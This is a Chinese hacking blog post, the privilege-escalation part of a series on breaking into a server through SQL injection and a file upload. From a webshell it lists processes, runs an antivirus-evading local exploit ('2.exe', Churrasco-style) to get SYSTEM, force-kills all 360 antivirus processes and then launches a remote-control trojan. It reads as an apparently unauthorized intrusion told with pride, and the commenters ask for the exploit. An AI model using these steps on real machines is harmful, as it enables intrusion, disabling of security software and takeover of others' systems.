记一次Sql注入+上传拿shell+提权+嗅探C段(图文)(提权)

写文章的时候出了点差错,被猫神嘲笑了。。。继续继续。我少用点图,多上文字了。


3.提权

  • webshell执行命令看看权限

D:\> whoami

nt authority\network service

  • 看看有什么杀软

D:\> tasklist


映像名称                       PID 会话名              会话#       内存使用 

========================= ======== ================ =========== ============

System Idle Process              0 Console                    0         28 K

System                           4 Console                    0        308 K

smss.exe                       312 Console                    0        568 K

csrss.exe                      360 Console                    0      6,800 K

winlogon.exe                   388 Console                    0     11,364 K

services.exe                   436 Console                    0      7,804 K

lsass.exe                      448 Console                    0      8,988 K

svchost.exe                    600 Console                    0      7,972 K

svchost.exe                    680 Console                    0      8,536 K

360rps.exe                     740 Console                    0      3,200 K

svchost.exe                    764 Console                    0     20,084 K

ZhuDongFangYu.exe              780 Console                    0     13,032 K

svchost.exe                    856 Console                    0     35,948 K

inetinfo.exe                   984 Console                    0      9,352 K

svchost.exe                   1012 Console                    0     13,824 K

svchost.exe                   1324 Console                    0     13,448 K

alg.exe                       1508 Console                    0      3,336 K

wmiprvse.exe                  1916 Console                    0      5,668 K

csrss.exe                     1192                            1      7,624 K

winlogon.exe                  1268                            1      3,048 K

rdpclip.exe                   1848                            1      1,992 K

explorer.exe                  2032                            1     36,292 K

360tray.exe                   2096                            1      6,464 K

ctfmon.exe                    2104                            1        828 K

svchost.exe                   2272 Console                    0     13,532 K

logon.scr                     3952 Console                    0      1,896 K

360sd.exe                     3860                            1      1,708 K

360rp.exe                     3264                            1     47,304 K

msdtc.exe                     2088 Console                    0      4,976 K

w3wp.exe                       656 Console                    0     27,584 K

w3wp.exe                      2976 Console                    0      7,588 K

wmiprvse.exe                  1892 Console                    0      5,848 K

cmd.exe                       3844 Console                    0      1,876 K

tasklist.exe                  2988 Console                    0      4,236 K

  • 有360,无视他好了。直接上免杀exp,溢出提权。

D:\RECYCLER\> 2.exe "whoami"


/Churraskito/-->This exploit gives you a Local System shell 

/Churraskito/-->Got WMI process Pid: 3660 

/Churraskito/-->Found token NETWORK SERVICE 

/Churraskito/-->Found token SYSTEM 

/Churraskito/-->Running command

nt authority\system

  • system权限,直接kill360所有进程,让360再装逼?

D:\RECYCLER\> 2.exe "taskkill /f /im 360*"

...

成功: 已终止进程 "360rps.exe",其 PID 为 740。

成功: 已终止进程 "360tray.exe",其 PID 为 2096。

成功: 已终止进程 "360sd.exe",其 PID 为 3860。

成功: 已终止进程 "360rp.exe",其 PID 为 3264。


D:\RECYCLER\> 2.exe "taskkill /f /im ZhuDongFangYu.exe"

...

成功: 已终止进程 "ZhuDongFangYu.exe",其 PID 为 780。

  • 利用system运行个远控木马

blob.png


本文由Hack Blog原创,如需转载注明原文链接

作者:test 分类:漏洞 浏览:4971 评论:3
留言列表
访客
访客 不明觉厉膜拜问个问题用菜刀连接大马?还是一句话?还有多谢大神那个要提权的就是我谢谢!  回复
访客
访客 来个exe  回复
访客
访客 求exp  回复
发表评论
来宾的头像